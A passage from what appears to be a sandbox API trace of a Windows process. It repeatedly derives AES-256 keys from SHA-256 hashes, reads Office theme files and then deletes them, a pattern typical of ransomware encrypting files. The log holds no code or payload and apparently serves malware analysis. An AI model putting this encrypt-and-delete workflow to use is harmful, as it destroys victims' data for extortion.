[0159.441] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.441] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c3 [0159.441] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.452] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.452] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.452] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.453] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml")) returned 1 [0159.454] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.455] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.455] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.455] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.455] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0159.455] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.456] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.456] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.456] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.457] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\_help.txt")) returned 1 [0159.465] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0159.477] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0159.478] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.479] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.479] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.479] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.479] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe19 [0159.479] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.496] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.496] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml")) returned 1 [0159.498] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.498] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.498] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.498] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.498] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe2a [0159.498] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.509] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.509] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.509] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.510] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml")) returned 1 [0159.511] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.512] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.512] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.512] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.512] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeee [0159.512] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.532] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.532] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.532] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.533] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml")) returned 1 [0159.535] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.535] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.535] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.535] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.535] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe1f [0159.535] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.548] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.548] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.548] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.550] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml")) returned 1 [0159.551] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.551] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.551] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.551] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.552] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe0b [0159.552] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.554] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.554] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.554] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.555] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml")) returned 1 [0159.557] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.557] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.557] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.557] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.557] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe16 [0159.557] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.573] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.573] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.573] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml")) returned 1 [0159.576] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.576] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.576] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.576] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.576] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xefb [0159.576] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.597] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.597] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.597] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.598] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml")) returned 1 [0159.600] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.600] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.600] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.600] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.600] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe1f [0159.600] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.602] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.603] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.603] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml")) returned 1 [0159.619] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.619] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.619] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.619] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.619] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe0f [0159.619] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.622] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.622] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.622] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml")) returned 1 [0159.624] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.625] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.625] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.625] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.625] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe0e [0159.625] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.627] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.627] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.627] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.628] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml")) returned 1 [0159.629] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.630] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.630] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.630] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.630] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdc6 [0159.630] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.641] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.641] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.641] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.642] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml")) returned 1 [0159.644] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.644] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.644] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.644] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.644] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xefc [0159.644] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.647] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.647] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.647] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.649] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml")) returned 1 [0159.650] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.650] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.650] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.650] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.650] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe48 [0159.650] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.653] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.653] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.653] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.654] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml")) returned 1 [0159.655] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.655] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.655] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.655] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.656] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef5 [0159.656] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.670] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.670] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.670] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.671] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml")) returned 1 [0159.672] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.673] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.673] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.673] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.673] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe16 [0159.673] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.678] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.678] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.678] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.679] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml")) returned 1 [0159.680] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.681] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.681] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.681] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.681] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe2f [0159.681] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.683] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.683] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.683] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml")) returned 1 [0159.685] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.685] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.685] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.685] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.685] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdb5 [0159.685] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.687] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.687] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.687] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml")) returned 1 [0159.690] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.691] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.691] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.691] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, 